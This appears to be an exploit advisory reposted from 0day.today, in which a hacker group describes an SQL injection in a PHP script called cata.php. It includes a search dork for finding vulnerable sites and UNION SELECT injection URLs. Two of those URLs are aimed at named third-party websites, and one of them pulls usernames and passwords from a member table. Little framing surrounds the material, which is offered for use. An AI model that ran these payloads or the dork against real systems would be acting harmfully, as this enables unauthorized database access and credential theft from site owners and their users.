Cata (cata.php) SQL Injection Vulnerability

🗓️ 01 Dec 2010 00:00:00Reported by Hackeri-ALType

zdt🔗 0day.today👁 57 Views

Cata PHP SQL Injection Vulnerability by Hackeri-A

===========================================
Cata (cata.php) SQL Injection Vulnerability
===========================================

[~] Vulnerability found by : Hackeri-AL

########################################################################
       
       Author         	: Hackeri-AL		 	                  
       Contact        	: h-al [at] hotmail [dot] it                         
       Greetz   	: LoocK3D & b4cKd00r ~ & GHoST61 & BaDBoy
                          1337db.com & By_aGReSiF & FurTy & RedGuard
                          cHs & boom3rang & [email protected] & All Albania Hackers
       My Group         : UAH-Crew = United Albania Hackers /Best Hackers

       Date      : 2010-11-01
       Version   : Cata PHP
       Tested on : Windows XP
       

#########################################################################

[~] DORK: inurl:"cata.php"

----------------------------------------------------------------------------------------------------------------------

[~] Exploit     : http://web.com/cata.php?cat=1+union+select 1,2,3,group_concat(COLUMN,0x3a,COLUMN),5,6,7+from+TABLE-- 

[~] Example     : htpp://web.com/cata.php?cat=1[SQL] < Injected


[~] Site Demo   : http://monalisa.arcadevillage.com/cata.php?cat=1+union+select 1,2,3,group_concat(pseudo,0x3a,pass),5,6,7+from+membre-- 
                
                : http://www.angoltanszek.hu/readingroom/catalogue/cata.php?dw=list&id=-3+union+select+1,@@version,3,4,5--

#########################################################################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

#########################################################################




#  0day.today [2018-01-01]  #

01 Dec 2010 00:00Current

7.1High risk

Vulners AI Score7.1